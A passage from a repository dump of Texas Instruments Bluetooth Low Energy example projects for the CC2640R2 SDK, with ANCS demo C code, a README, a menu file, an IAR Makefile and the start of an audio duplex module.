IO_BUTTON_LEFT)\n Ancs_acceptIncomingCall();\n\n // Calls the function to perform a positive action upon the current notification.\n else if (keys == IO_BUTTON_RIGHT)\n Ancs_declineIncomingCall();\n }\n\n 
return;\n}\n\n/*********************************************************************\n * @fn AncsApp_keyPressCB\n *\n * @brief Callback to the handle keys function (AncsApp_handleKeysEvt()).\n *\n * @param keys - bit field for key events.\n *\n * @return none\n */\nstatic void AncsApp_keyPressCB(uint8 keys)\n{\n // Enqueue the event.\n AncsApp_enqueueMsg(ANCSAPP_KEY_CHANGE_EVT, keys, 0);\n\n return;\n}\n\n/*********************************************************************\n * @fn AncsApp_passcodeCB\n *\n * @brief Passcode callback.\n *\n * @return none\n */\nstatic void AncsApp_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs)\n{\n uint8_t *pData;\n\n // Allocate space for the passcode event.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = uiOutputs;\n\n // Enqueue the event.\n AncsApp_enqueueMsg(ANCSAPP_PASSCODE_NEEDED_EVT, 0, pData);\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processPasscode\n *\n * @brief Process the Passcode request.\n *\n * @return none\n */\nstatic void AncsApp_processPasscode(uint8_t uiOutputs)\n{\n // This app uses a default passcode. A real-life scenario would handle all\n // pairing scenarios and likely generate this randomly.\n uint32_t passcode = B_APP_DEFAULT_PASSCODE;\n\n // Display passcode to user\n if (uiOutputs != 0)\n {\n Display_print1(dispHandle, 4, 0, \"Passcode: %d\", passcode);\n }\n\n uint16_t connectionHandle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connectionHandle);\n\n // Send passcode response\n GAPBondMgr_PasscodeRsp(connectionHandle, SUCCESS, passcode);\n}\n\n#ifdef USE_WATCHDOG_TIMER\n/*\n * ======== watchdogCallback ========\n * Watchdog interrupt callback function.\n */\nstatic void watchdogCallback(uintptr_t unused)\n{\n /* Clear watchdog interrupt flag */\n Watchdog_clear(watchdogHandle);\n Display_print0(dispHandle, 16, 0, \"Watchdog kicked!\");\n\n /* Insert timeout handling code here. */\n}\n/*********************************************************************\n * @fn AncsApp_performPeriodicTask\n *\n * @brief Perform a periodic application task. This function gets called\n * every five seconds (ANCSAPP_PERIODIC_EVT_PERIOD). 
In this example,\n * it simply clears (\"kicks\") the watchdog timer so that the device is\n * not reset while the application is running normally.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AncsApp_performPeriodicTask(void)\n{\n Watchdog_clear(watchdogHandle);\n Display_print0(dispHandle, 16, 0, \"Watchdog cleared!\");\n}\n\n/*********************************************************************\n * @fn AncsApp_clockHandler\n *\n * @brief Handler function for clock timeouts.\n *\n * @param arg - event type\n *\n * @return None.\n */\nstatic void AncsApp_clockHandler(UArg arg)\n{\n // Wake up the application.\n Event_post(syncEvent, arg);\n}\n#endif\n/*********************************************************************\n * @fn AncsApp_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData - message data pointer.\n *\n * @return TRUE or FALSE\n */\nstatic uint8_t AncsApp_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData)\n{\n ancsAppEvt_t *pMsg = ICall_malloc(sizeof(ancsAppEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.735872209072113,
"alphanum_fraction": 0.7762372493743896,
"avg_line_length": 47.084388732910156,
"blob_id": "3d62a93dc26122bab25b756f9e6aec0210a1a31a",
"content_id": "7223977dd36afa2ec34c4ab68379b84b5fd93c47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11396,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 237,
"path": "/README.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# Introduction TEST\n\nThese examples and demos are for **TI SimpleLink CC2640R2 SDK 1.40.00.45**\n\nThis repository contains **experimental** *Bluetooth®* 5 and\n*Bluetooth®* 4.2 Low Energy sample applications for Texas Instruments'\nSimpleLink CC2640R2 SDK. These examples have not been validated as\nproduction-ready.\n\n**Do not** use GitHub's bug tracking feature for support. For inquiries, see the\n[Bluetooth® low energy Forum](https://e2e.ti.com/support/wireless_connectivity/bluetooth_low_energy/f/538).\n\nTo use the examples and tools in this repository, please download and install\nthe [SimpleLink CC2640R2 SDK](http://www.ti.com/ble-stack) **first**, and if\nnecessary [buy an evaluation kit](http://www.ti.com/tool/launchxl-cc2640r2).\n\nFor other hardware and software resources,\n[please visit our wiki](http://www.ti.com/ble-wiki). If you have any questions\nplease refer to the [FAQ page](docs/faq.md).\n\nFor extra examples for **TI BLE-Stack 2.2.x SDK** (CC26x0R1), see\n[Branch: ble_examples-2.2](https://github.com/ti-simplelink/ble_examples/tree/ble_examples-2.2).\n\n# Navigating the Repository\n\nThe examples provided on this GitHub page serve as a plugin to a corresponding\nBLE-Stack SDK release. The master branch will always point to the latest release.\n\nOlder releases can be accessed by checking out/downloading their corresponding\nbranch. For more information on supported examples\nplease consult the readme.md of the desired branch/release.\n\n**Note: As of CC21640R2 SDK 1.35 and later the `ble5apps` component was added.**\n - ble5apps: Supports the Bluetooth 5 Core Specification and TI's BLE5-Stack.\n - bleapps: Supports the Bluetooth 4.2 Core Specification and TI's BLE-Stack component.\n\nFor for more information about different SDK components, please consult the\nstack's User Guide.\n\n## Change Log\n\nNote: The version numbers below are related to GitHub ble_examples releases.\nThe numbering scheme is in the form of M.mm.pp.bb. The fields pp.bb are incremented\nas GitHub examples are released, M.mm will map a GitHub release to a SimpleLink\nSDK release.\n\n### 1.40.02.02\n* Memory optimized Duplex Audio demo (Central + Peripheral)\n* SPP over BLE bug-fixes\n* Throughput demo fixes and porting to 1.40 SDK\n\n### 1.40.01.01\n\n* Added SPP over BLE (client/server) projects for BLE5- Stack and BLE-Stack\n* Minor ANCS updates\n\n### 1.40.00.00\nInitial offering of Simplelink CC2640R2 SDK 1.40.00.45 examples.\n* BLE5-Stack: Throughput Demo (Central/Peripheral)\n* BLE5-Stack: Long Range Demo (Central/Peripheral)\n* BLE5-Stack: Serial Port Profile (SPP) Server/Client\n* BLE-Stack: Serial Port Profile (SPP) Server/Client\n* BLE-Stack: Bidirectional Audio Demo (Central/Peripheral)\n* BLE-Stack: Apple Notification Center Service (ANCS) Demo (Peripheral)\n* Tools: voice.py script for Voice-over-HOGP\n\n\n## Installation\n\nThis repository can be cloned and tracked using Git. For instructions on how to\nclone a repository from Github please refer to this guide:\n[Clone from Github](https://help.github.com/articles/cloning-a-repository/)\n\nFor users who are unfamiliar with Git, there is the option of downloading the\ncontents of the repository as a zip file. See instructions below.\n\n1. Click the green \"Clone or download\" button\n1. Select \"Download ZIP\" option\n1. Zip folder will appear in your Downloads folder\n\nThis repository can be cloned/download anywhere on your computer. 
There is a\ndependency between this repository and the SimpleLink CC2640R2 SDK install\nlocation.\n\nBy default the SimpleLink CC2640R2 SDK will install to:\n\n C:\\ti\\simplelink_cc2640r2_sdk_1_40_00_45\n\nIf the Simplelink CC2640R2 SDK must be installed to a different location, then\nsee the [FAQ page](docs/faq.md) for IDE specific instructions for changing\nenvironment variables.\n\n## Required Tools\n\nSimilar to the Simplelink CC2640R2 SDK, the examples in this repository support\nthe CCS and IAR toolchains. Please pay careful attention to versions of these\ntools; the supported versions are listed below. Using an unsupported version is\nuntested and may result in unexpected behavior.\n\n* CCS v7.2.0 with TI ARM Compiler v16.09\n* IAR for ARM v8.11.2\n\nFor more information on toolchain setup, please refer to our\n[FAQ page](docs/faq.md).\n\n## FAQ\n\nThe [FAQ page](docs/faq.md) will try to address some of the common questions\nrelated to the ble_examples repo.\n\n## Examples / Demo List\n\n### Full Duplex Bidirectional Audio Demo\n\nEncode and transmit a full duplex bidirectional audio stream over BLE using two\nCC2640R2 LaunchPads with CC3200AUDBOOST.\n\n* simple\\_central\\_bidirectional\\_audio\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/readme.md)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_central_bidirectional_audio/src)\n\n* simple\\_peripheral\\_bidirectional\\_audio\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/readme.md)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/simple_peripheral_bidirectional_audio/src)\n\n### Bluetooth 5 Throughput Demo\n\nThis is a two-part demo where a throughput\\_central and throughput\\_peripheral\nconnect with one another, demonstrating the BLE5-Stack's 1 Mbps, 2 Mbps, 1+2\nMbps, and Coded PHYs.\n\n* throughput\\_central\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src)\n* throughput\\_peripheral\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/src)\n\n### Bluetooth 5 Long Range Demo\n\nThis is a two-part demo where a longrange\\_central and longrange\\_peripheral\nconnect with one another, demonstrating the BLE5-Stack's long range capabilities\nusing the Coded PHY (S8).\n\n* longrange\\_central\n * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/readme.md)\n * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/tirtos/iar)\n * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/tirtos/ccs)\n * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src)\n* longrange\\_peripheral\n * 
[Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/src)\n\n### Serial Port Profile (SPP) BLE Examples\n\nThis is a 2-part example where a spp\\_ble\\_client and spp\\_ble\\_server connect\nwith one another and exchange data over UART.\n\nThe demo supports Bluetooth 5, demonstrating the BLE5-Stack's new high-speed 2 Mbps PHY:\n\n* spp\\_ble\\_client\n    * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/src)\n* spp\\_ble\\_server\n    * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_server/src)\n\nThe example also supports Bluetooth 4.2, demonstrating the BLE-Stack's Data Length\nExtension with OAD support:\n\n* spp\\_ble\\_client\n    * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_client/src)\n* spp\\_ble\\_server\n    * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/spp_ble_server/src)\n\n### Apple Notification Center Service (ANCS) Demo\n\nThis example demonstrates the use and functionality of ANCS. ANCS is a GATT\nservice present on iOS devices used to retrieve and interact with iOS notifications.\n\n* ancs\n    * [Documentation](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/readme.md)\n    * [IAR Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/iar)\n    * [CCS Project Files](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/ccs)\n    * [Source](examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src)\n\n## Tools\n\n### [Voice.py](tools/scripts/voice/voice.py)\nThis script allows developers to evaluate the Voice over\nHID-over-GATT-Profile (HoGP) feature, which is demonstrated as part of the\n`voice_hogp_remote` example. The `voice_hogp_remote` example is available as part of the\n[SimpleLink CC2640R2 SDK BLE Example Pack](http://www.ti.com/tool/download/SIMPLELINK-CC2640R2-SDK-BLE-EXAMPLE-PACK).\nThe `voice.py` Python script is compatible with Python 2 or Python 3 and depends\non the Windows®-only [pywinusb](https://pypi.python.org/pypi/pywinusb/) Python\nmodule. The script has been tested on a Windows 10 host with a Bluetooth 4.0\ncompatible controller. 
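\n\nAs a rough illustration, the transport classes behind `voice.py` can also be\ndriven directly. The following sketch mirrors the test harness at the bottom of\n`tools/scripts/voice/transport/hidtransport.py`; it assumes it is run from the\n`tools/scripts/voice` directory, and the vendor/product IDs are placeholders for\nyour own HID device:\n\n```python\nimport logging\nfrom time import sleep\nfrom transport.hidtransport import HIDVoHoGP\n\nlogging.basicConfig(level=logging.INFO)\n\ndef on_audio(data):\n    # Invoked with the accumulated audio payload once a Stop report arrives\n    print(\"Received %d bytes of encoded audio\" % len(data))\n\n# Placeholder IDs, matching the module's own test harness\nhid = HIDVoHoGP(on_audio, vendor_id=0x000d, product_id=0x0000)\nhid.setDataValidation(True)  # enable the experimental lost-frame check\nif hid.open():\n    while hid.isConnected():\n        sleep(1)\nhid.close()\n```\n\n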
For help on how to use the `voice.py` script, simply\ninvoke its help menu with `voice.py --help`.\n\n## References\n\nThe following reference pages may be helpful during general Bluetooth Low\nEnergy development. New users of the SimpleLink CC2640R2 platform and Bluetooth\n5 development are encouraged to read the\n[BLE5-Stack User's Guide][BLE5-Stack].\nUsers developing Bluetooth 4.2 applications are encouraged to read the\n[BLE Software Developer's Guide][BLE-Stack].\n\nAs an additional resource, users are encouraged to complete the\n[SimpleLink Academy](http://software-dl.ti.com/lprf/simplelink_academy/overview.html)\ntraining.\n\nOther resources can be found below:\n\n* [BLE wiki](http://www.ti.com/ble-wiki)\n* [BLE E2E Page](http://www.ti.com/ble-forum)\n\n[BLE5-Stack]: http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/ble5stack/ble_user_guide/html/ble-stack-5.x-guide/index.html\n[BLE-Stack]: http://software-dl.ti.com/simplelink/esd/simplelink_cc2640r2_sdk/1.40.00.45/exports/docs/blestack/ble_user_guide/html/ble-stack-3.x-guide/index.html\n"
},
{
"alpha_fraction": 0.690304696559906,
"alphanum_fraction": 0.7030470967292786,
"avg_line_length": 37.38298034667969,
"blob_id": "ffb0de3b26105f65a5f0edd75f4ab05ee623b071",
"content_id": "802efa5fa2e4c59c947fa298a49c6317dde26dff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1805,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 47,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_central/src/app/throughput_central_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"throughput_central_menu.h\"\n#include \"throughput_central.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 3 submenus, no actions, no upper */\nMENU_OBJ(sbcMenuMain, NULL, 5, NULL)\n MENU_ITEM_SUBMENU(&sbcMenuScanandConnect)\n MENU_ITEM_SUBMENU(&sbcMenuSetPhy)\n MENU_ITEM_SUBMENU(&sbcMenuSetDLEPDU)\n MENU_ITEM_ACTION(\"Toggle RSSI Readings\", SimpleBLECentral_doToggleRSSI)\n MENU_ITEM_ACTION(\"Disconnect\", SimpleBLECentral_doDisconnect)\nMENU_OBJ_END\n\n/* Menu: Scanning and Connection\n 3 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuScanandConnect, \"Scan/Connect Menu\", 3, &sbcMenuMain)\n MENU_ITEM_ACTION(\"Select Next Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Connect to Selected Device\", SimpleBLECentral_doScanAndConnect)\n MENU_ITEM_ACTION(\"Scan for Devices\", SimpleBLECentral_doScanAndConnect)\nMENU_OBJ_END\n\n/* Menu: Set PHY\n 5 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuSetPhy, \"Set PHY\", 4, &sbcMenuMain)\n MENU_ITEM_ACTION(\"1 Mbps\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"2 Mbps\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S2\", SimpleBLECentral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S8\", SimpleBLECentral_doSetPhy)\nMENU_OBJ_END\n\n/* Menu: Set DLE PDU\n 2 actions, upper = sbpMenuMain */\nMENU_OBJ(sbcMenuSetDLEPDU, \"Set PDU\", 2, &sbcMenuMain)\n MENU_ITEM_ACTION(\"27 Bytes\", SimpleBLECentral_doSetDLEPDU)\n MENU_ITEM_ACTION(\"251 Bytes\", SimpleBLECentral_doSetDLEPDU)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
{
"alpha_fraction": 0.6597671508789062,
"alphanum_fraction": 0.6979301571846008,
"avg_line_length": 22.074626922607422,
"blob_id": "d738dbd117492dc47c4c7062fa075b9dcf763856",
"content_id": "2a49f1a52e7e5ff4e6a7a65eb97835cacc54eee0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1546,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 67,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/tirtos/iar/Makefile",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "PROJECT=$(BLE_REPO)/examples/rtos/CC2640R2_LAUNCHXL/blestack/ancs/tirtos/iar\nBLE_REPO=../../../../../../..\nIAR_PATH=C:/Program\\ Files\\ \\(x86\\)/IAR\\ Systems/EWARM-$(IAR_VERSION)/common/bin\nIAR_VERSION=8.11.1\n\nall: ancs_src\n\nrelease: clean ancs\n\nancs:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack.ewp \\\n\t-build \\\n\tFlashROM_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app.ewp \\\n\t-build \\\n\tFlashROM_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\nancs_src:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack_src.ewp \\\n\t-build \\\n\tFlashOnly_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app_src.ewp \\\n\t-build \\\n\tFlashOnly_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\nclean:\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack.ewp \\\n\t-clean \\\n\tFlashROM_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app.ewp \\\n\t-clean \\\n\tFlashROM_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/stack/cc2640r2lp_stack_src.ewp \\\n\t-clean \\\n\tFlashOnly_Library \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n\n\t$(IAR_PATH)/iarbuild.exe $(PROJECT)/app/cc2640r2lp_app_src.ewp \\\n\t-clean \\\n\tFlashOnly_StackLibrary \\\n\t-log info \\\n\t-parallel 1 \\\n\t-varfile ancs_src.custom_argvars\n"
},
{
"alpha_fraction": 0.5383416414260864,
"alphanum_fraction": 0.5527970194816589,
"avg_line_length": 32.34946060180664,
"blob_id": "f5ec937c33b0cef812e16efe6e695f7c47a5edae",
"content_id": "23b871ffb5dbb86d3ddff3b37c9e6d402d97de8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 37218,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 1116,
"path": "/source/ti/blestack/profiles/audio_dle/audio_duplex.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Filename: audio_duplex.c\n *\n * Description: Implements bidirectional VoGP audio/voice communication\n * This module connects data from the user application task(buttons),\n * data from the I2S driver (local audio frames), and data from the\n * BLE-Stack Audio Profile (incoming audio frames).\n *\n * Calls to this module run in the application task context. A callback\n * must be plugged for the module to handle higher priority CBs such as\n * Audio data and I2S callbacks\n *\n * Copyright (C) 2016 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n#include <ti/sysbios/BIOS.h>\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/family/arm/m3/Hwi.h>\n#include <driverlib/vims.h>\n#include <driverlib/flash.h>\n#include <ti/display/Display.h>\n#include <profiles/audio_dle/audio_profile_dle.h>\n#include <ti/audiocodec/audiocodec.h>\n#include <third_party/sbc/include/msbc_library.h>\n#include <ti/drivers/i2s/I2SCC26XX.h>\n#include <ti/drivers/pdm/Codec1.h>\n\n#include \"audio_duplex.h\"\n#include \"icall_ble_api.h\"\n#include \"hal_flash.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n#define BLEAUDIO_NUM_NOT_PER_FRAME_ADPCM 1\n#define BLEAUDIO_NUM_NOT_PER_FRAME_MSBC 1\n\n/*\n * Required Memory for Bi-directional audio streaming:\n * The I2S driver requires two blocks of memory to be\n * passed in at its open call.\n * 1. Queue memory for TI-RTOS Queue elements\n * 2. 
Sample memory for sample buffers\n *\n * The amount of memory required while streaming is:\n * (uncompressed buffer)*2 (bidirectional)*sizeof(uint16_t)*I2SCC26XX_QUEUE_SIZE\n *\n * An mSBC frame is larger than an ADPCM frame, so we size for the worst case\n */\n#define I2S_BUF   sizeof(int16_t) * (AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME * \\\n                                     I2SCC26XX_QUEUE_SIZE * 2)\n\n#define I2S_MEM_BASE (GPRAM_BASE + FlashSectorSizeGet())\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void AudioDuplex_i2sCallbackFxn(I2SCC26XX_Handle handle,\n                                       I2SCC26XX_StreamNotification *notification);\nstatic void AudioDuplex_enableCache();\nstatic void AudioDuplex_disableCache();\nstatic bStatus_t AudioDuplex_transmitAudioFrame(uint8_t *buf);\nstatic I2SCC26XX_Handle AudioDuplex_openI2S(void);\nstatic void AudioDuplex_startI2Sstream(void);\nstatic void AudioDuplex_stopI2Sstream(void);\nstatic void AudioDuplex_sendStartCmd(void);\nstatic void AudioDuplex_sendStopCmd(void);\nstatic void AudioDuplex_shiftEncodedBuffer(uint8_t *encodedBuf, uint8_t len,\n                                           uint8_t streamType);\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Audio Buffer variables\nstatic int16_t *audio_decoded = NULL;\nstatic uint8_t *i2sContMgtBuffer = NULL;\nstatic sbc_t sbc = {0};\nstatic size_t written = 0;\n\n// I2S Variables\nstatic I2SCC26XX_Handle i2sHandle = NULL;\nstatic I2SCC26XX_StreamNotification i2sStream;\nstatic bool i2sStreamInProgress = false;\nstatic uint8_t volume = AUDIO_DUPLEX_MAX_VOLUME;\nstatic uint8_t seqNum = 0;\n\n// BLE Connection handle of stream\nuint16_t audioConnectionHandle = 0;\n// Display Interface\nstatic Display_Handle hDisp = NULL;\n// A function pointer to call in the application to set an event\nstatic pfnAudioDuplexCB_t appAudioCB = NULL;\n\nstatic AudioDuplex_streamVars streamVariables =\n{\n    AudioDuplex_stream_idle,\n    AudioDuplex_stream_idle,\n    AUDIO_DUPLEX_STREAM_TYPE_NONE,\n    AUDIO_DUPLEX_STREAM_TYPE_NONE,\n    0,\n    0,\n    I2SCC26XX_QUEUE_SIZE,\n    BLEAUDIO_MAX_NOTSIZE,\n    0, // si\n    0, // pv\n    0, // si_rx\n    0, // pv_rx\n    AUDIO_DUPLEX_MAX_VOLUME, // maxVolume\n};\n\nstatic I2SCC26XX_Params i2sParams =\n{\n    .requestMode            = I2SCC26XX_CALLBACK_MODE,\n    .ui32requestTimeout     = BIOS_WAIT_FOREVER,\n    .callbackFxn            = AudioDuplex_i2sCallbackFxn,\n    .blockSize              = AUDIO_DUPLEX_MSBC_SAMPLES_PER_FRAME,\n    .pvContBuffer           = NULL,\n    .ui32conBufTotalSize    = 0,\n    .pvContMgtBuffer        = NULL,\n    .ui32conMgtBufTotalSize = 0,\n    .currentStream          = &i2sStream\n};\n\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn      AudioDuplex_open\n *\n * @brief   Called during initialization, opens codec and I2S driver\n *          Initializes hardware and adds Audio Profile\n *\n * @param   None.\n *\n * @return  None.\n */\nint8_t AudioDuplex_open(Display_Handle displayHandle, PIN_Handle pinHandle,\n                        pfnAudioDuplexCB_t inputCB)\n{\n    uint8_t status = AUDIO_DUPLEX_SUCCESS;\n    hDisp = displayHandle;\n\n    // Store app callback if not null\n    if(inputCB == NULL)\n    {\n        Display_print0(hDisp, 4, 0, \"Fail: AudioCB is NULL\");\n        return (AUDIO_INVALID_PARAMS);\n    }\n\n    appAudioCB = inputCB;\n\n    /* Initialize I2S driver */\n    i2sHandle = 
